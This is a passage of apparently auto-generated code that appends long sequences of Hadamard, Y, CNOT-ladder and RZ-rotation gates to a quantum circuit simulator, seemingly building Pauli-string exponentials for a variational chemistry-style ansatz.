sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.946331, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.867847, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.324597, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.099363, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.270469, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.511343, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(3))
